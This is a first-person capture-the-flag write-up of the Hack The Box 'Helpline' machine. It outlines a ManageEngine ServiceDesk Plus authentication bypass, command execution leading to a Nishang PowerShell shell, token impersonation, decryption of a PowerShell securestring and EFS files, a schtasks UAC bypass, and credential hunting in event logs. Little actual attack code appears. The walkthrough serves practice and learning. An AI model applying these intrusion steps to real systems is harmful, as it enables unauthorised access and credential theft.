HTB Helpline writeup (English)
HTB Helpline writeup
Thanks egre55. I've learned a lot from this machine!
Also, big thanks to ATK and Senn for helping me to solve this challenge!
Overview
- Even with the highest priv, the flags were not visible
--> EFS encrypted. Two ways to decrypt. Even in constraint language mode, you can still decrypt the file.
- There is a harder way to get the flaghttp://blackpentesters.blogspot.com/2017/01/decrypting-efs-encrypted-files.html
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files
- schtasks is your firend ; bypass UAC
"Attack tree"-ish mind map
Port Scan
root@kali:~/hackthebox/Helpline# nmap -A -p- 10.10.10.132
135/tcp open msrpc Microsoft Windows RPC
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open http-proxy -
_http-title: ManageEngine ServiceDesk Plus
SMB didn't give out any information. In such cases, I always look into Web applications.
Web application authentication bypass
Quickly google the application and the version; found the seemingly working exploit. By the way, never ever run exploits blindly without reading the code carefully!
Logged in as "guest"
replace the cookies with the ones shown in the exploit
Admin!
I found "Custom Schedule" with "Executor" function. Seemed that OS commands could be run there.
At this point, no idea with what kind of priv the application was running. Worth trying if the outbound connection is allowed.
powershell in-memory attack
I used my favorite "Nishang".
nishang
https://github.com/samratashok/nishang
SYSTEM priv? Hmm... strange. Too good to be true.
Anyway, where are the flags?
PS C:\Users> get-childitem -recurse
Directory: C:\Users
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/20/2018 11:09 PM 32 root.txt
Directory: C:\Users\leo\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/15/2019 12:18 AM 526 admin-pass.xml
Directory: C:\Users\tolu\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/20/2018 11:12 PM 32 user.txt
See? This is definitely a big problem!
Darn, EFS. Honestly, I'm not good at openssl mumbo-jumbo.
Token impersonation
The quickest way for decryption is a token impersonation.
I confirmed that leo's process is running.
The admin-pass.xml has long digits. After some googling, I realized it is securestring.
Powershell Secure string
There are two ways to decrypt the powershell securestring. The first one didn't work due to constraint language mode.
GetNetworkCredential worked.
Getting root.txt
I could log on to the target via psexec.py, but the "whoami" still showed "SYSTEM". So decided to use schtasks. Believe or not, the good and old technique still works!
Getting user.txt
zachary belongs to "Event Log Readers". Seems the author want me to read event log. Let's compile all the logs into a single text file and grep "tolu".
$logfile=gc .\test.txt
Yeah, there it is.
After putting "tolu" into local admin, the rest is the same as above.